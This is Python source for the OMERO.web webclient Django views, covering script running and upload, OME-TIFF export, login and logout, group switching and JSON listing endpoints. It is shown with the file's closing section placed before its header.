                pval = prototype.val  # list
                # check if a value type has been set (first item of prototype
                # list)
                if len(pval) > 0:
                    listClass = pval[0].__class__
                    if listClass == int(1).__class__:
                        listClass = omero.rtypes.rint
                    if listClass == long(1).__class__:
                        listClass = omero.rtypes.rlong

                # construct our list, using appropriate 'type'
                valueList = []
                for v in values:
                    try:
                        # RStringI() will encode any unicode
                        obj = listClass(v.strip())
                    except Exception:
                        logger.debug("Invalid entry for '%s' : %s" % (key, v))
                        continue
                    if isinstance(obj, omero.model.IObject):
                        valueList.append(omero.rtypes.robject(obj))
                    else:
                        valueList.append(obj)
                inputMap[key] = omero.rtypes.rlist(valueList)

            # Handle other rtypes: String, Long, Int etc.
            else:
                value = request.POST[key]
                if len(value) == 0:
                    continue
                try:
                    inputMap[key] = pclass(value)
                except Exception:
                    logger.debug("Invalid entry for '%s' : %s" % (key, value))
                    continue

    # If we have objects specified via 'IDs' and 'DataType', try to pick
    # correct group
    if "IDs" in inputMap and "Data_Type" in inputMap:
        gid = conn.SERVICE_OPTS.getOmeroGroup()
        conn.SERVICE_OPTS.setOmeroGroup("-1")
        try:
            firstObj = conn.getObject(
                inputMap["Data_Type"].val, unwrap(inputMap["IDs"])[0]
            )
            newGid = firstObj.getDetails().group.id.val
            conn.SERVICE_OPTS.setOmeroGroup(newGid)
        except Exception:
            logger.debug(traceback.format_exc())
            # if inputMap values not as expected or firstObj is None
            conn.SERVICE_OPTS.setOmeroGroup(gid)

    try:
        # Try/except in case inputs are not serializable, e.g. unicode
        logger.debug("Running script %s with " "params %s" % (scriptName, inputMap))
    except Exception:
        pass
    rsp = run_script(request, conn, sId, inputMap, scriptName)
    return JsonResponse(rsp)
@login_required(isAdmin=True)
@render_response()
def script_upload(request, conn=None, **kwargs):
    """Script upload UI

    GET renders the upload form; POST uploads (or replaces) an official
    script at <script_path>/<uploaded file name> and returns a status
    message plus the script ID.
    """
    if request.method != "POST":
        return {"template": "webclient/scripts/upload_script.html"}

    # Assemble the full server-side path: <path>/<filename>
    raw_path = request.POST.get("script_path")
    uploaded = request.FILES["script_file"]
    uploaded.seek(0)
    script_text = uploaded.read().decode("utf-8")
    if not raw_path.endswith("/"):
        raw_path += "/"
    full_path = raw_path + uploaded.name

    # If script exists, replace. Otherwise upload
    scriptService = conn.getScriptService()
    script_id = scriptService.getScriptID(full_path)
    try:
        if script_id > 0:
            scriptService.editScript(OriginalFileI(script_id, False), script_text)
            message = "Script Replaced: %s" % uploaded.name
        else:
            script_id = scriptService.uploadOfficialScript(full_path, script_text)
            message = "Script Uploaded: %s" % uploaded.name
    except omero.ValidationException as ex:
        message = str(ex)
    return {"Message": message, "script_id": script_id}
@require_POST
@login_required()
def ome_tiff_script(request, imageId, conn=None, **kwargs):
    """
    Uses the scripting service (Batch Image Export script) to generate
    OME-TIFF for an image and attach this as a file annotation to the image.
    Script will show up in the 'Activities' for users to monitor and download
    result etc.
    """
    scriptService = conn.getScriptService()
    sId = scriptService.getScriptID("/omero/export_scripts/Batch_Image_Export.py")

    # Switch to the image's own group so the script can annotate it
    image = conn.getObject("Image", imageId)
    if image is not None:
        conn.SERVICE_OPTS.setOmeroGroup(image.getDetails().group.id.val)

    inputMap = {
        "Data_Type": wrap("Image"),
        "IDs": rlist([rlong(long(imageId))]),
        "Format": wrap("OME-TIFF"),
    }
    rsp = run_script(request, conn, sId, inputMap, scriptName="Create OME-TIFF")
    return JsonResponse(rsp)
def run_script(request, conn, sId, inputMap, scriptName="Script"):
    """
    Starts running a script, adding details to the request.session so that it
    shows up in the webclient Activities panel and results are available there
    etc.

    :param request:    Django request; session['callback'] is updated
    :param conn:       BlitzGateway connection
    :param sId:        Script ID
    :param inputMap:   Map of script input name -> rtype value
    :param scriptName: Display name used in the Activities panel
    :return:           {'jobId': ..., 'status': ...} on success, or
                       {'status': ..., 'error': ...} if the launch failed
    """
    request.session.modified = True
    scriptService = conn.getScriptService()
    try:
        handle = scriptService.runScript(sId, inputMap, None, conn.SERVICE_OPTS)
        # E.g. ProcessCallback/4ab13b23-22c9-4b5f-9318-40f9a1acc4e9 -t:tcp -h 10.37.129.2 -p 53154:tcp -h 10.211.55.2 -p 53154:tcp -h 10.12.1.230 -p 53154  # noqa
        jobId = str(handle)
        status = "in progress"
        request.session["callback"][jobId] = {
            "job_type": "script",
            "job_name": scriptName,
            "start_time": datetime.datetime.now(),
            "status": status,
        }
        request.session.modified = True
    except Exception as x:
        jobId = str(time())  # E.g. 1312803670.6076391
        # handle python 2 or 3 errors
        message = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
        if message and message.startswith("No processor available"):
            # omero.ResourceError
            logger.info(traceback.format_exc())
            error = "No Processor Available"
            status = "no processor available"
            message = ""  # template displays message and link
        else:
            logger.error(traceback.format_exc())
            error = traceback.format_exc()
            status = "failed"
            # Fix: previously this branch re-read 'x.message', which raises
            # AttributeError on Python 3 (exceptions have no 'message');
            # keep the py2/py3-safe value computed above instead.
        # save the error to http session, for display in 'Activities' window
        request.session["callback"][jobId] = {
            "job_type": "script",
            "job_name": scriptName,
            "start_time": datetime.datetime.now(),
            "status": status,
            "Message": message,
            "error": error,
        }
        return {"status": status, "error": error}
    return {"jobId": jobId, "status": status}
@login_required()
@render_response()
def ome_tiff_info(request, imageId, conn=None, **kwargs):
    """
    Query to see if we have an OME-TIFF attached to the image (assume only 1,
    since Batch Image Export will delete old ones)
    """
    # Any existing OME-TIFF will appear in list
    links = list(
        conn.getAnnotationLinks(
            "Image", [imageId], ns=omero.constants.namespaces.NSOMETIFF
        )
    )
    if not links:
        return {}

    # Highest link ID === most recently created annotation
    newest = max(links, key=lambda lnk: lnk.getId())
    created = newest.creationEventDate()
    annId = newest.getChild().getId()

    from omeroweb.webgateway.templatetags.common_filters import ago

    # will get returned as json by default
    return {
        "created": str(created),
        "ago": ago(created),
        "id": annId,
        "download": reverse("download_annotation", args=[annId]),
    }
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2020 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
""" A view functions is simply a Python function that takes a Web request and
returns a Web response. This response can be the HTML contents of a Web page,
or a redirect, or the 404 and 500 error, or an XML document, or an image...
or anything."""
import copy
import os
import datetime
import Ice
from Ice import Exception as IceException
import logging
import traceback
import json
import re
import sys
import warnings
from past.builtins import unicode
from future.utils import bytes_to_native_str
from django.utils.http import is_safe_url
from time import time
from omeroweb.version import omeroweb_buildyear as build_year
from omeroweb.version import omeroweb_version as omero_version
import omero
import omero.scripts
from omero.rtypes import wrap, unwrap, rlong, rlist
from omero.gateway.utils import toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import (
Http404,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.utils.http import urlencode
from django.core.urlresolvers import reverse, NoReverseMatch
from django.utils.encoding import smart_str
from django.views.decorators.cache import never_cache
from django.views.decorators.http import require_POST
from django.shortcuts import render
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
from omeroweb.webgateway.util import get_longs as webgateway_get_longs
from omeroweb.feedback.views import handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import render_response
from omeroweb.webclient.show import (
Show,
IncorrectMenuError,
paths_to_object,
paths_to_tag,
)
from omeroweb.decorators import (
ConnCleaningHttpResponse,
parse_url,
TableClosingHttpResponse,
)
from omeroweb.webgateway.util import getIntOrDefault
from omero.model import (
AnnotationAnnotationLinkI,
DatasetI,
DatasetImageLinkI,
ExperimenterI,
ImageI,
OriginalFileI,
PlateI,
ProjectI,
ProjectDatasetLinkI,
ScreenI,
ScreenPlateLinkI,
TagAnnotationI,
)
from omero import ApiUsageException, ServerError, CmdError
from omeroweb.webgateway.views import LoginView
from . import tree
# Py2/Py3 compatibility: make sure a module-level ``long`` name exists.
# ``import long`` presumably fails everywhere, leaving ``long`` bound to
# the builtin ``int`` (int and long are unified in Python 3).
try:
    import long
except ImportError:
    long = int

# Module-level logger; the INIT line records the worker process id.
logger = logging.getLogger(__name__)
logger.info("INIT '%s'" % os.getpid())

# We want to allow a higher default limit for annotations so we can load
# all the annotations expected for a PAGE of images
ANNOTATIONS_LIMIT = settings.PAGE * 100
def get_long_or_default(request, name, default):
    """
    Fetch a single query-string parameter and coerce it to a long.

    Falls back to ``default`` when the parameter is absent; ``None`` stays
    ``None``.  Coercion errors are deliberately not caught here: callers
    are expected to surface failures of basic type validation.
    """
    raw = request.GET.get(name, default)
    if raw is None:
        return None
    return long(raw)
def get_list(request, name):
    """Return all values for *name* from the query string, dropping empties."""
    values = request.GET.getlist(name)
    result = []
    for item in values:
        if item != "":
            result.append(item)
    return result
def get_longs(request, name):
    """
    Deprecated shim kept for backwards compatibility.

    Emits a DeprecationWarning and delegates to
    omeroweb.webgateway.util.get_longs().
    """
    message = "Deprecated. Use omeroweb.webgateway.util.get_longs()"
    warnings.warn(message, DeprecationWarning)
    return webgateway_get_longs(request, name)
def get_bool_or_default(request, name, default):
    """
    Read a query-string parameter as a boolean.

    Missing parameters fall back to ``default``.  As with
    get_long_or_default(), type-validation errors are intentionally
    propagated to the caller rather than caught here.
    """
    raw = request.GET.get(name, default)
    return toBoolean(raw)
def validate_redirect_url(url):
    """
    Return a redirect target that is safe to follow.

    URLs pointing at a host outside settings.REDIRECT_ALLOWED_HOSTS are
    replaced with the webclient index URL, preventing open redirects.
    """
    if is_safe_url(url, allowed_hosts=settings.REDIRECT_ALLOWED_HOSTS):
        return url
    return reverse("webindex")
##############################################################################
# custom index page
@never_cache
@render_response()
def custom_index(request, conn=None, **kwargs):
    """
    Render the landing page, honouring settings.INDEX_TEMPLATE if set.

    When the configured template cannot be loaded, fall back to the
    default index template and expose the error message in the context.
    """
    context = {"version": omero_version, "build_year": build_year}
    if settings.INDEX_TEMPLATE is None:
        context["template"] = "webclient/index.html"
        return context
    try:
        # Probe that the custom template actually loads before using it.
        template_loader.get_template(settings.INDEX_TEMPLATE)
        context["template"] = settings.INDEX_TEMPLATE
    except Exception:
        context["template"] = "webclient/index.html"
        context["error"] = traceback.format_exception(*sys.exc_info())[-1]
    return context
##############################################################################
# views
class WebclientLoginView(LoginView):
    """
    Webclient Login - Customises the superclass LoginView
    for webclient. Also can be used by other Apps to log in to OMERO. Uses
    the 'server' id from request to lookup the server-id (index), host and
    port from settings. E.g. "localhost", 4064. Stores these details, along
    with username, password etc in the request.session. Resets other data
    parameters in the request.session. Tries to get connection to OMERO and
    if this works, then we are redirected to the 'index' page or url
    specified in REQUEST. If we can't connect, the login page is returned
    with appropriate error messages.
    """

    # Template rendered for the login form.
    template = "webclient/login.html"
    # User-agent string reported to the OMERO server for created sessions.
    useragent = "OMERO.web"

    def get(self, request):
        """
        GET simply returns the login page
        """
        return self.handle_not_logged_in(request)

    def handle_logged_in(self, request, conn, connector):
        """
        We override this to provide webclient-specific functionality
        such as cleaning up any previous sessions (if user didn't logout)
        and redirect to specified url or webclient index page.

        @param request:   http request
        @param conn:      gateway connection for the newly created session
        @param connector: connector holding the server connection details
        """
        # webclient has various state that needs cleaning up...
        # if 'active_group' remains in session from previous
        # login, check it's valid for this user
        # NB: we do this for public users in @login_required.get_connection()
        if request.session.get("active_group"):
            if (
                request.session.get("active_group")
                not in conn.getEventContext().memberOfGroups
            ):
                del request.session["active_group"]
        if request.session.get("user_id"):
            # always want to revert to logged-in user
            del request.session["user_id"]
        if request.session.get("server_settings"):
            # always clean when logging in
            del request.session["server_settings"]
        # do we ned to display server version ?
        # server_version = conn.getServerVersion()
        if request.POST.get("noredirect"):
            # Caller (e.g. AJAX login) asked for a plain acknowledgement
            # instead of a redirect.
            return HttpResponse("OK")
        url = request.GET.get("url")
        if url is None or len(url) == 0:
            try:
                url = parse_url(settings.LOGIN_REDIRECT)
            except Exception:
                url = reverse("webindex")
        else:
            # Open-redirect guard: only follow URLs whose host passes the
            # REDIRECT_ALLOWED_HOSTS check (see validate_redirect_url()).
            url = validate_redirect_url(url)
        return HttpResponseRedirect(url)

    def handle_not_logged_in(self, request, error=None, form=None):
        """
        Returns a response for failed login.
        Reason for failure may be due to server 'error' or because
        of form validation errors.

        @param request: http request
        @param error: Error message
        @param form: Instance of Login Form, populated with data
        """
        if form is None:
            # Build a fresh login form, pre-selecting the requested server.
            server_id = request.GET.get("server", request.POST.get("server"))
            if server_id is not None:
                # NOTE(review): ``unicode`` is Python-2 only; presumably a
                # compatibility shim is provided at import time - verify.
                initial = {"server": unicode(server_id)}
                form = LoginForm(initial=initial)
            else:
                form = LoginForm()
        context = {
            "version": omero_version,
            "build_year": build_year,
            "error": error,
            "form": form,
        }
        url = request.GET.get("url")
        if url is not None and len(url) != 0:
            # Preserve the post-login destination across the login round-trip.
            context["url"] = urlencode({"url": url})
        if hasattr(settings, "LOGIN_LOGO"):
            context["LOGIN_LOGO"] = settings.LOGIN_LOGO
        if settings.PUBLIC_ENABLED:
            # Offer the public-login link when the index URL is matched by
            # the configured public URL filter.
            redirect = reverse("webindex")
            if settings.PUBLIC_URL_FILTER.search(redirect):
                context["public_enabled"] = True
                context["public_login_redirect"] = redirect
        context["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
        if settings.SHOW_CLIENT_DOWNLOADS:
            # Derive a client-download tag regex from the server version,
            # e.g. "5.6.3" -> "^v5\.6\.[^-]+$".
            ver = re.match(
                (
                    r"(?P<major>\d+)\."
                    r"(?P<minor>\d+)\."
                    r"(?P<patch>\d+\.?)?"
                    r"(?P<dev>(dev|a|b|rc)\d+)?.*"
                ),
                omero_version,
            )
            client_download_tag_re = "^v%s\\.%s\\.[^-]+$" % (
                ver.group("major"),
                ver.group("minor"),
            )
            context["client_download_tag_re"] = client_download_tag_re
            context["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
        return render(request, self.template, context)
@login_required(ignore_login_fail=True)
def keepalive_ping(request, conn=None, **kwargs):
    """
    Keep the OMERO session alive.

    The @login_required decorator performs the actual ping/timeout
    handling, so the view body only acknowledges the request.
    """
    return HttpResponse("OK")
@login_required()
def change_active_group(request, conn=None, url=None, **kwargs):
    """
    Update request.session['active_group'] (read later by the
    @login_required decorator to scope group-based queries) and then
    redirect to ``url``, falling back to the webclient index.

    The target is passed through validate_redirect_url() first.
    """
    switch_active_group(request)
    target = validate_redirect_url(url or reverse("webindex"))
    return HttpResponseRedirect(target)
def switch_active_group(request, active_group=None):
    """
    Store the chosen group id in request.session['active_group'].

    The @login_required decorator later reads this value to configure the
    connection for group-based queries.  When ``active_group`` is not
    given it is taken from the ?active_group= query parameter.
    """
    if active_group is None:
        active_group = request.GET.get("active_group")
    active_group = int(active_group)
    already_current = (
        "active_group" in request.session
        and request.session["active_group"] == active_group
    )
    if not already_current:
        # Mark the session dirty so Django persists the change.
        request.session.modified = True
        request.session["active_group"] = active_group
def fake_experimenter(request, default_name="All members"):
    """
    Build a marshalled stand-in experimenter for the special id -1.

    The display name comes from the server-side setting
    omero.client.ui.menu.dropdown.everyone.label, falling back to
    ``default_name`` when it is not configured.
    """
    server_settings = request.session.get("server_settings")
    dropdown = server_settings.get("ui", {}).get("menu", {}).get("dropdown", {})
    label = dropdown.get("everyone", {}).get("label", default_name)
    return {
        "id": -1,
        "omeName": label,
        "firstName": label,
        "lastName": "",
    }
@login_required(login_redirect="webindex")
def logout(request, conn=None, **kwargs):
    """
    Close the OMERO connection and clear the web session.

    A POST performs the actual logout and redirects to the login view;
    any other method renders a confirmation form instead.
    """
    if request.method != "POST":
        # Ask the user to confirm via a simple POST form.
        context = {"url": reverse("weblogout"), "submit": "Do you want to log out?"}
        template = "webgateway/base/includes/post_form.html"
        return render(request, template, context)
    try:
        try:
            conn.close()
        except Exception:
            logger.error("Exception during logout.", exc_info=True)
    finally:
        # Always drop the Django session, even if closing the
        # connection failed.
        request.session.flush()
    return HttpResponseRedirect(reverse(settings.LOGIN_VIEW))
###########################################################################
def _load_template(request, menu, conn=None, url=None, **kwargs):
    """
    This view handles most of the top-level pages, as specified by 'menu' E.g.
    userdata, usertags, history, search etc.
    Query string 'path' that specifies an object to display in the data tree
    is parsed.
    We also prepare the list of users in the current group, for the
    switch-user form. Change-group form is also prepared.

    @param request: http request
    @param menu:    top-level page name, e.g. 'userdata', 'search'
    @param conn:    gateway connection
    @param url:     NOTE(review): the incoming value is only used for the
                    public-user redirect below and is later overwritten
                    with the 'load_template' URL - confirm intentional.
    """
    request.session.modified = True
    # Resolve the template to render, unless one was passed in kwargs.
    template = kwargs.get("template", None)
    if template is None:
        if menu == "userdata":
            template = "webclient/data/containers.html"
        elif menu == "usertags":
            template = "webclient/data/containers.html"
        else:
            # E.g. search/search.html
            template = "webclient/%s/%s.html" % (menu, menu)
    # tree support
    show = kwargs.get("show", Show(conn, request, menu))
    # Constructor does no loading. Show.first_selected must be called first
    # in order to set up our initial state correctly.
    try:
        first_sel = show.first_selected
    except IncorrectMenuError as e:
        return HttpResponseRedirect(e.uri)
    # We get the owner of the top level object, E.g. Project
    # Actual api_paths_to_object() is retrieved by jsTree once loaded
    initially_open_owner = show.initially_open_owner
    # If we failed to find 'show'...
    if request.GET.get("show", None) is not None and first_sel is None:
        # and we're logged in as PUBLIC user...
        if (
            settings.PUBLIC_ENABLED
            and settings.PUBLIC_USER == conn.getUser().getOmeName()
        ):
            # this is likely a regular user who needs to log in as themselves.
            # Login then redirect to current url
            return HttpResponseRedirect("%s?url=%s" % (reverse("weblogin"), url))
    # need to be sure that tree will be correct omero.group
    if first_sel is not None:
        switch_active_group(request, first_sel.details.group.id.val)
    # search support
    init = {}
    global_search_form = GlobalSearchForm(data=request.GET.copy())
    if menu == "search":
        if global_search_form.is_valid():
            init["query"] = global_search_form.cleaned_data["search_query"]
    # get url without request string - used to refresh page after switch
    # user/group etc
    url = kwargs.get("load_template_url", None)
    if url is None:
        url = reverse(viewname="load_template", args=[menu])
    # validate experimenter is in the active group
    active_group = request.session.get("active_group") or conn.getEventContext().groupId
    # prepare members of group...
    leaders, members = conn.getObject("ExperimenterGroup", active_group).groupSummary()
    userIds = [u.id for u in leaders]
    userIds.extend([u.id for u in members])
    # check any change in experimenter...
    # NB: user_id of -1 means the special 'All Members' pseudo-user.
    user_id = request.GET.get("experimenter")
    if initially_open_owner is not None:
        if request.session.get("user_id", None) != -1:
            # if we're not already showing 'All Members'...
            user_id = initially_open_owner
    try:
        user_id = long(user_id)
    except Exception:
        # Missing or non-numeric experimenter parameter.
        user_id = None
    # check if user_id is in a currnt group
    if user_id is not None:
        if (
            user_id
            not in (
                set(map(lambda x: x.id, leaders)) | set(map(lambda x: x.id, members))
            )
            and user_id != -1
        ):
            # All users in group is allowed
            user_id = None
    if user_id is None:
        # ... or check that current user is valid in active group
        user_id = request.session.get("user_id", None)
        if user_id is None or int(user_id) not in userIds:
            if user_id != -1:  # All users in group is allowed
                user_id = conn.getEventContext().userId
    request.session["user_id"] = user_id
    myGroups = list(conn.getGroupsMemberOf())
    myGroups.sort(key=lambda x: x.getName().lower())
    groups = myGroups
    new_container_form = ContainerForm()
    # colleagues required for search.html page only.
    myColleagues = {}
    if menu == "search":
        for g in groups:
            g.loadLeadersAndMembers()
            for c in g.leaders + g.colleagues:
                myColleagues[c.id] = c
        myColleagues = list(myColleagues.values())
        myColleagues.sort(key=lambda x: x.getLastName().lower())
    # Assemble the template context consumed by @render_response.
    context = {
        "menu": menu,
        "init": init,
        "myGroups": myGroups,
        "new_container_form": new_container_form,
        "global_search_form": global_search_form,
    }
    context["groups"] = groups
    context["myColleagues"] = myColleagues
    context["active_group"] = conn.getObject("ExperimenterGroup", long(active_group))
    context["active_user"] = conn.getObject("Experimenter", long(user_id))
    context["initially_select"] = show.initially_select
    context["initially_open"] = show.initially_open
    context["isLeader"] = conn.isLeader()
    context["current_url"] = url
    context["page_size"] = settings.PAGE
    context["template"] = template
    context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
    context["current_admin_privileges"] = conn.getCurrentAdminPrivileges()
    context["leader_of_groups"] = conn.getEventContext().leaderOfGroups
    context["member_of_groups"] = conn.getEventContext().memberOfGroups
    return context
@login_required()
@render_response()
def load_template(request, menu, conn=None, url=None, **kwargs):
    """Thin view wrapper delegating to _load_template()."""
    return _load_template(request, menu, conn=conn, url=url, **kwargs)
@login_required()
@render_response()
def group_user_content(request, url=None, conn=None, **kwargs):
    """
    Load the HTML content of the Groups/Users drop-down menu shown on the
    main webclient pages.

    ``url`` should be supplied in the request, as the target for a
    redirect after switching group.

    @param request: http request
    @param url:     redirect target used after switching group
    @param conn:    gateway connection
    """
    myGroups = list(conn.getGroupsMemberOf())
    myGroups.sort(key=lambda x: x.getName().lower())
    if conn.isAdmin():  # Admin can see all groups
        # Fetch the security roles once (previously two identical remote
        # calls) to identify the 'user' and 'guest' system groups.
        roles = conn.getAdminService().getSecurityRoles()
        system_groups = [roles.userGroupId, roles.guestGroupId]
        groups = conn.getObjects("ExperimenterGroup", opts={"load_experimenters": True})
        groups = [g for g in groups if g.getId() not in system_groups]
        groups.sort(key=lambda x: x.getName().lower())
    else:
        groups = myGroups
    for g in groups:
        g.loadLeadersAndMembers()  # load leaders / members
    context = {
        "template": "webclient/base/includes/group_user_content.html",
        "current_url": url,
        "groups": groups,
        "myGroups": myGroups,
    }
    return context
@login_required()
def api_group_list(request, conn=None, **kwargs):
    """Return a JSON listing of groups, optionally scoped to one member."""
    # Parse paging / filter parameters from the query string.
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        member_id = get_long_or_default(request, "member", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    # Marshal the groups, translating OMERO errors to HTTP responses.
    try:
        marshalled = tree.marshal_groups(
            conn=conn, member_id=member_id, page=page, limit=limit
        )
    except ApiUsageException as err:
        return HttpResponseBadRequest(err.serverStackTrace)
    except ServerError as err:
        return HttpResponseServerError(err.serverStackTrace)
    except IceException as err:
        return HttpResponseServerError(err.message)
    return JsonResponse({"groups": marshalled})
@login_required()
def api_experimenter_detail(request, experimenter_id, conn=None, **kwargs):
    """JSON detail for one experimenter; id -1 yields the fake 'all members'."""
    # Validate parameter
    try:
        experimenter_id = long(experimenter_id)
    except ValueError:
        return HttpResponseBadRequest("Invalid experimenter id")
    try:
        if experimenter_id < 0:
            # Special id: marshal the fake 'everyone' experimenter.
            experimenter = fake_experimenter(request)
        else:
            experimenter = tree.marshal_experimenter(
                conn=conn, experimenter_id=experimenter_id
            )
            if experimenter is None:
                raise Http404("No Experimenter found with ID %s" % experimenter_id)
        return JsonResponse({"experimenter": experimenter})
    except ApiUsageException as err:
        return HttpResponseBadRequest(err.serverStackTrace)
    except ServerError as err:
        return HttpResponseServerError(err.serverStackTrace)
    except IceException as err:
        return HttpResponseServerError(err.message)
@login_required()
def api_container_list(request, conn=None, **kwargs):
    """
    Return a JSON listing of the top-level containers for the data tree:
    projects, orphaned datasets, screens, orphaned plates and, when
    permitted, the 'Orphaned Images' pseudo-container.
    """
    # Get parameters
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        experimenter_id = get_long_or_default(request, "id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    # While this interface does support paging, it does so in a
    # very odd way. The results per page is enforced per query so this
    # will actually get the limit for projects, datasets (without
    # parents), screens and plates (without parents). This is fine for
    # the first page, but the second page may not be what is expected.
    if not conn.isValidGroup(group_id):
        return HttpResponseForbidden("Not a member of Group: %s" % group_id)
    r = dict()
    try:
        # Get the projects
        r["projects"] = tree.marshal_projects(
            conn=conn,
            group_id=group_id,
            experimenter_id=experimenter_id,
            page=page,
            limit=limit,
        )
        # Get the orphaned datasets (without project parents)
        r["datasets"] = tree.marshal_datasets(
            conn=conn,
            orphaned=True,
            group_id=group_id,
            experimenter_id=experimenter_id,
            page=page,
            limit=limit,
        )
        # Get the screens for the current user
        r["screens"] = tree.marshal_screens(
            conn=conn,
            group_id=group_id,
            experimenter_id=experimenter_id,
            page=page,
            limit=limit,
        )
        # Get the orphaned plates (without project parents)
        r["plates"] = tree.marshal_plates(
            conn=conn,
            orphaned=True,
            group_id=group_id,
            experimenter_id=experimenter_id,
            page=page,
            limit=limit,
        )
        # Get the orphaned images container
        try:
            orph_t = request.session["server_settings"]["ui"]["tree"]["orphans"]
        except Exception:
            # Server setting absent: default to showing orphaned images.
            orph_t = {"enabled": True}
        # Admins, leaders of the active group, and the owner always see
        # the orphaned container; others only when the feature is enabled.
        if (
            conn.isAdmin()
            or conn.isLeader(gid=request.session.get("active_group"))
            or experimenter_id == conn.getUserId()
            or orph_t.get("enabled", True)
        ):
            orphaned = tree.marshal_orphaned(
                conn=conn,
                group_id=group_id,
                experimenter_id=experimenter_id,
                page=page,
                limit=limit,
            )
            orphaned["name"] = orph_t.get("name", "Orphaned Images")
            r["orphaned"] = orphaned
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse(r)
@login_required()
def api_dataset_list(request, conn=None, **kwargs):
    """Return a JSON list of datasets, optionally restricted to one project."""
    # Parse query-string parameters.
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        project_id = get_long_or_default(request, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not conn.isValidGroup(group_id):
        return HttpResponseForbidden("Not a member of Group: %s" % group_id)
    try:
        marshalled = tree.marshal_datasets(
            conn=conn, project_id=project_id, group_id=group_id, page=page, limit=limit
        )
    except ApiUsageException as err:
        return HttpResponseBadRequest(err.serverStackTrace)
    except ServerError as err:
        return HttpResponseServerError(err.serverStackTrace)
    except IceException as err:
        return HttpResponseServerError(err.message)
    return JsonResponse({"datasets": marshalled})
@login_required()
def api_image_list(request, conn=None, **kwargs):
    """Return a JSON list of images.

    Specifiying dataset_id returns only images in that dataset.
    Specifying experimenter_id returns orphaned images for that user:
    images belonging to the user but not in any dataset belonging to the
    user.  When both are specified, experimenter_id is ignored.
    """
    # Parse query-string parameters.
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        dataset_id = get_long_or_default(request, "id", None)
        orphaned = get_bool_or_default(request, "orphaned", False)
        load_pixels = get_bool_or_default(request, "sizeXYZ", False)
        thumb_version = get_bool_or_default(request, "thumbVersion", False)
        date = get_bool_or_default(request, "date", False)
        experimenter_id = get_long_or_default(request, "experimenter_id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not conn.isValidGroup(group_id):
        return HttpResponseForbidden("Not a member of Group: %s" % group_id)
    # Share ID is in kwargs from api/share_images/<id>/ which will create
    # a share connection in @login_required.
    # We don't support ?share_id in query string since this would allow a
    # share connection to be created for ALL urls, instead of just this one.
    share_id = None
    if "share_id" in kwargs:
        share_id = long(kwargs["share_id"]) or None
    try:
        marshalled = tree.marshal_images(
            conn=conn,
            orphaned=orphaned,
            experimenter_id=experimenter_id,
            dataset_id=dataset_id,
            share_id=share_id,
            load_pixels=load_pixels,
            group_id=group_id,
            page=page,
            date=date,
            thumb_version=thumb_version,
            limit=limit,
        )
    except ApiUsageException as err:
        return HttpResponseBadRequest(err.serverStackTrace)
    except ServerError as err:
        return HttpResponseServerError(err.serverStackTrace)
    except IceException as err:
        return HttpResponseServerError(err.message)
    return JsonResponse({"images": marshalled})
@login_required()
def api_plate_list(request, conn=None, **kwargs):
    """Return a JSON list of plates, optionally restricted to one screen."""
    # Parse query-string parameters.
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        screen_id = get_long_or_default(request, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not conn.isValidGroup(group_id):
        return HttpResponseForbidden("Not a member of Group: %s" % group_id)
    try:
        marshalled = tree.marshal_plates(
            conn=conn, screen_id=screen_id, group_id=group_id, page=page, limit=limit
        )
    except ApiUsageException as err:
        return HttpResponseBadRequest(err.serverStackTrace)
    except ServerError as err:
        return HttpResponseServerError(err.serverStackTrace)
    except IceException as err:
        return HttpResponseServerError(err.message)
